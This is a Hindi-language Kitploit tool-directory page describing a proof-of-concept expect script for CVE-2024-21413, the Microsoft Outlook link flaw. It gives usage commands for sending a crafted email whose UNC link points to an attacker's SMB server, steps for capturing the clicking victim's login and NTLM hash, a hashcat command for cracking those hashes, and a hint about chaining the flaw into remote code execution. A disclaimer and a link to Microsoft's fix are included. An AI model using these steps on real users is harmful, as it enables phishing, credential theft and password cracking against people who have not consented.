Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-21413 — Microsoft Outlook सूचना प्रकटीकरण भेद्यता (पासवर्ड हैश लीक) - Expect Script POC | Kitploit
उपकरण/GitHubGitHub/duy-31/cve-2024-21413
पासवर्ड क्रैकिंगफ़िशिंग उपकरणभेद्यता विश्लेषणशोषणलर्निंग और शिक्षाईमेल सुरक्षा
GitHubduy-31/cve-2024-21413

CVE-2024-21413

Microsoft Outlook सूचना प्रकटीकरण भेद्यता (पासवर्ड हैश लीक) - Expect Script POC

रिपॉजिटरी देखें
1573352 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-21413 - Expect Script POC

Microsoft Outlook लीक क्रेडेंशियल्स और रिमोट कोड एक्ज़ीक्यूशन भेद्यता जब CVE-2023-21716 के साथ जोड़ा जाता है (पूर्वावलोकन पैनल के माध्यम से) CVSS:3.1 9.8 / 8.5

आउटलुक को बाहरी लिंक खोलने पर जोखिम के बारे में आपको चेतावनी देनी चाहिए => लेकिन ऐसा नहीं है!

image

उपयोग: ./cve-2024-21413.sh mx.fqdn port sender recipient url

./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"

नोट: chmod +x cve-2024-21413.sh

एप 'expect' की आवश्यकता है और वैध आईपी प्रेषक तथा ईमेल प्रेषक की आवश्यकता है (SPF, DKIM, DMARC पास करने के लिए)


  • सबसे पहले इस तरह एक smb लिसनर चलाएँ

image

  • poc चलाएँ

image

  • और ईमेल की प्रतीक्षा करें और पूर्वावलोकन विंडो में लिंक पर क्लिक करें

image

  • फिर आपको लिंक पर क्लिक करने वाले व्यक्ति का लॉगिन और हैश प्राप्त करना चाहिए (प्रभावित आउटलुक संस्करण पर चेतावनी संकेत के बिना)

    image

  • फिर आप हैशकैट के साथ पासवर्ड क्रैक करने का प्रयास कर सकते हैं। लॉगिन नाम वाली सभी पंक्तियों को एक फ़ाइल में कॉपी करें और hashcat को मॉड्यूल 5600 के साथ चलाएँ।

hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O

  • आप इस CVE को CVE-2023-21716 के साथ जोड़कर RCE प्राप्त कर सकते हैं !!!

श्रेय: [https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/]

वर्कअराउंड/फिक्स: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]


मेरे बारे में अधिक ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ अस्वीकरण: महत्वपूर्ण: यह स्क्रिप्ट केवल शैक्षिक, नैतिक परीक्षण और कानूनी उपयोग के लिए प्रदान की गई है। इसे बिना स्पष्ट अनुमति के किसी भी सिस्टम या नेटवर्क पर उपयोग न करें। कंप्यूटर सिस्टम और नेटवर्क तक अनधिकृत पहुँच अवैध है, और अनधिकृत गतिविधियाँ करते पकड़े गए उपयोगकर्ता कानूनी कार्रवाई के अधीन हैं। इस स्क्रिप्ट के दुरुपयोग से हुई किसी भी क्षति के लिए लेखक उत्तरदायी नहीं है।

टूल डाउनलोड करें